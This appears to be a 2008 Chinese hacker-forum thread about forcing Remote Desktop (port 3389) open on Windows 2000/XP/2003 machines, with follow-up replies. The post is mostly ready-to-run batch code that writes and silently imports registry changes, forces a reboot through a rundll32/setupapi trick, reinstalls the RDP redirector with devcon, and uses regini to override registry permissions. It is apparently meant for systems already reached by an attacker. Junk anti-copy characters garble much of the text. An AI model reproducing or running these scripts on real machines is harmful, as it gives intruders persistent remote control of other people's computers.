Board logo

标题: [原创文章] 【原创】跨越3389障碍终极思考 [打印本页]
作者: 柔肠寸断    时间: 2008-8-12 01:43     标题: 【原创】跨越3389障碍终极思考

文章首发:[3.A.S.T]http://www.3ast.com.cn/
5 \7 ]1 L+ ?0 o+ d# u原文作者:柔肠寸断[3.A.S.T]( m' B9 S$ P9 _8 J7 C* r3 s8 ~& B# m
+ c% {$ R' \7 `, o+ X6 m6 f$ }% O
=========================================
0 k1 k/ [9 |0 @& O5 N8 L" N/ a首先给点基础的代码,然后再说障碍1 g. H9 C& S4 {9 f3 K+ R
=========================================
# P; L& E, G: ^  L5 n* K+ j6 M2000生成3389bat代码
  1. echo Windows Registry Editor Version 5.00 >2000.reg
  2. echo. >>2000.reg
  3. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
  4. echo "Enabled"="0" >>2000.reg
  5. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
  6. echo "ShutdownWithoutLogon"="0" >>2000.reg
  7. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
  8. echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
  9. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
  10. echo "TSEnabled"=dword:00000001 >>2000.reg
  11. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
  12. echo "Start"=dword:00000002 >>2000.reg
  13. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
  14. echo "Start"=dword:00000002 >>2000.reg
  15. echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
  16. echo "Hotkey"="1" >>2000.reg
  17. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
  18. echo "PortNumber"=dword:00000D3D >>2000.reg
  19. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
  20. echo "PortNumber"=dword:00000D3D >>2000.reg
复制代码
Win XP&Win 2003生成3389bat代码
  1. echo Windows Registry Editor Version 5.00 >3389.reg
  2. echo. >>3389.reg
  3. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
  4. echo "fDenyTSConnections"=dword:00000000 >>3389.reg
  5. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
  6. echo "PortNumber"=dword:00000d3d >>3389.reg
  7. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
  8. echo "PortNumber"=dword:00000d3d >>3389.reg
复制代码
其中PortNumber是端口号,00000d3d为3389, K( M5 t( `. o6 g) j1 p% \

, y  D+ b: I& x" r通过cmd下“  regedit /s "reg文件路径"  ”进行reg文件导入
5 a! Q5 L" R' D* l( c. Z但是必须要重新启动,虽然已经表面上开启了
0 i, j+ b/ \0 J' G* R8 F给一段比较好的代码,从众多代码中遴选出来的,具有较高的成功率,基本上重启成功率达到100%7 c! K; `5 H2 y+ f1 J

. V/ s9 Y( o! W7 U( Z0 Z重启bat代码
  1. @ECHO OFF & cd/d %temp% & echo [version] > restart.inf
  2. (set inf=InstallHinfSection DefaultInstall)
  3. echo signature=$chicago$ >> restart.inf
  4. echo [defaultinstall] >> restart.inf
  5. rundll32 setupapi,%inf% 1 %temp%\restart.inf
复制代码
如果安装有IIS,可以使用iisreset.exe    命令:iisreset /reboot
/ x# d: F5 `, B# g" I重启之后就可以登陆了,而且不会出现错误% S* J/ S  d* k! N6 I& B" Q
! o8 K& B) u, W  _
====================================================
& V9 G) L! I& f- i/ m. d" E! s下面听好了,开始说说障碍;1 ]# N- x9 S* X
面对很多的克隆版本操作系统,即使你成功开启了3389,但是你连接的时候会出现如图的情况7 Q# R, w- z3 Y) U
[attach]199[/attach]5 o6 ~5 M' }% ?" u1 N5 a) D% f
这是为什么呢??其实答案很简单,就是在做系统封装的时候,为了减小程序的体积,有的程序就被删除或者忽略了,造成现在的无法连接3389(但是已经开启了),这要怎么办呢????8 K/ F% c: G$ E7 V& p! _7 j
我们可以使用devcon程序,有的系统已经把他包含在自己的内部命令中,如果没有也没关系,微软官方网站都有下载,复制到system32目录,就可以当作内部命令使用了。我们为什么要用他???就是因为精简版的系统中,系统的终端服务器设备重定向器没有正确安装,我们用devcon的目的就是对终端服务器设备重定向器进行恢复。5 w! b3 }9 P# q, X" D1 @
运行
  1. devcon -r install %windir%\inf\machine.inf root\rdpdr
复制代码
成功执行,通过这种方法就可以解决上述问题
) T0 x2 q" A- l1 k) r8 ^[attach]200[/attach]' r2 H% A) p2 A4 C) d1 S1 d' e
再说一种比较常见的方法,导入一个Reg文件

  2. Windows Registry Editor Version 5.00
  3. [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\Root\\RDPDR\\0000]
  4. "ClassGUID"="{4D36E97D-E325-11CE-BFC1-08002BE10318}"
  5. "Class"="System"
  6. "HardwareID"=hex(7):52,00,4f,00,4f,00,54,00,5c,00,52,00,44,00,50,00,44,00,52,\\
  7. 00,00,00,00,00
  8. "Driver"="{4D36E97D-E325-11CE-BFC1-08002BE10318}\\\\0030"
  9. "Mfg"="(标准系统设备)"
  10. "Service"="rdpdr"
  11. "DeviceDesc"="终端服务器设备重定向器"
  12. "ConfigFlags"=dword:00000000
  13. "Capabilities"=dword:00000000
复制代码
对系统进行导入,但是问题又来了! U4 H5 a7 ~* j$ X$ b; b9 H; j' f
进行注册表文件进行导入的时候就会出现问题0 g4 ^7 m" L3 ^
[attach]201[/attach]
4 p* u; T7 R, R8 j. Y; r进行reg的查看才知道,是因为相关的键值没有权限才会造成无法导入
' M) i4 h, a9 Z3 C1 w$ V这里我推荐一个新的工具:Regini
; Z" O  f. S% T# ]6 D' `) k相关的用法(regini  /?  没有帮助):
( S. z% m6 Y, b3 ?: {( `  D$ R
: a& ~+ b  \1 A5 q1 O' \# o
Regini Data [Options...]
& w8 N( u" \! g7 f" c% v) o7 s     Useful Options:, x, E4 g; [, Q6 ]4 E
                1 - Administrators Full Access
* H) h2 s; i& e& l                2 - Administrators Read Access, l/ Z- o7 _" _' {. Z7 r
                3 - Administrators Read and Write Access
! O) @& Z6 D6 }$ _                4 - Administrators Read, Write and Delete Access
! p. |: H# `2 K/ Y                5 - Creator Full Access
8 u- N9 G3 G, z2 o                6 - Creator Read and Write Access
! L: \1 F: k# E                7 - World Full Access
. W2 _+ b5 T( t) s" Y                8 - World Read Access! P7 v$ |8 q0 j1 f" d
                9 - World Read and Write Access, e+ U( l3 v2 g& l9 H8 ~& N
               10 - World Read, Write and Delete Access5 L1 X4 L# t9 G1 W+ R
               11 - Power Users Full Access! l0 J! I" D1 M
               12 - Power Users Read and Write Access1 M  @- b* p" I6 v$ X
               13 - Power Users Read, Write and Delete Access* u9 n1 M5 d7 J& [2 F
               14 - System Operators Full Access
  S- s  N. l5 q) m! F; k5 [               15 - System Operators Read and Write Access2 D4 h5 T8 e; G+ ~& `& j
               16 - System Operators Read, Write and Delete Access
& E/ R6 ?2 P, c2 ~, ~* z2 K               17 - System Full Access
% j) U# Y. s$ k( U5 e6 z* U+ D1 W               18 - System Read and Write Access* j' O  B0 `4 p4 d$ V' [& p
               19 - System Read Access+ C! g7 T" E, {
               20 - Administrators Read, Write and Execute Access
; _1 ~, D2 k5 ]0 {5 x: ~4 Y  l4 _) J               21 - Interactive User Full Access
6 l' R3 E3 K- b; l* M) r               22 - Interactive User Read and Write Access
; g6 k7 w6 F# a' p5 ]$ J# S               23 - Interactive User Read, Write and Delete Access. x( h9 F! t: T# a( a

. `. ?" p' u4 _( q1 ~( H9 d, r2 g8 V, d$ f6 G% n/ y# _! v, M8 c
; o8 @8 ~0 Q. p3 {

/ g& k, B0 M* x* v( \& u7 [  v+ V6 Jdata中为注册表的键值,通过这样的方法就可以提升键值为相关的权限,从而成功导入reg文件! N7 Y- G3 E, m3 U% p& D; V
[attach]202[/attach]
作者: 流氓    时间: 2008-8-12 02:22

能看懂!!
, s1 n6 G1 {+ I, Q但是没有时间实践啊!!
' X* g+ }& }! h7 j3 d  W, ?# {! N还需努力!!!
; i8 D( x  x9 d1 N) R柔柔深夜写作!
5 V" I# S7 y/ x1 k' V3 Q' V! i值得学习!!!
作者: 柔肠寸断    时间: 2008-8-12 02:26

累死了,睡觉了.................
作者: saitojie    时间: 2008-8-12 02:51     标题: 回复 1楼 柔肠寸断 的帖子

小柔,上面的批处理有点问题,代码的最后四行,2000还有XP&2003的都有问题!
  1. echo "PortNumber"=dword:00000D3D >>2000.reg
  2. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
  3. echo "PortNumber"=dword:00000D3D >>2000.reg
复制代码
  1. echo "PortNumber"=dword:00000d3d >>3389.reg
  2. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
  3. echo "PortNumber"=dword:00000d3d >>3389.reg
复制代码
PortNumber
' C+ x$ }2 U$ {# S1 A3 G
' I$ Z( z. q9 Z如果是因为发出来的时候出现了表情,那你在发帖的时候,把左边的【禁用表情】勾上就可以了!2 l! X! i1 I9 \! n

6 e3 ~1 `& c* o+ m  z[ 本帖最后由 saitojie 于 2008-8-12 03:00 编辑 ]
作者: saitojie    时间: 2008-8-12 10:55

你再看看上面!8 j3 u4 l0 T6 w( G5 d# _3 I
你的批处理里面的是ortnumber我的是Portnumber
作者: 柔肠寸断    时间: 2008-8-12 11:38

OK了
作者: 律师界撒    时间: 2008-8-12 13:39

学习了: c& {: C1 o% W) l6 z
写的不错
作者: 3ast    时间: 2008-8-12 16:42

不错,学习
作者: applehdh    时间: 2008-8-14 14:41

学习一下啊  谢谢老大
作者: ylw7999    时间: 2008-9-2 21:51     标题: 云里雾里

去里雾里,分方向不清!
作者: 柔肠寸断    时间: 2009-2-19 17:10

自己定下



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2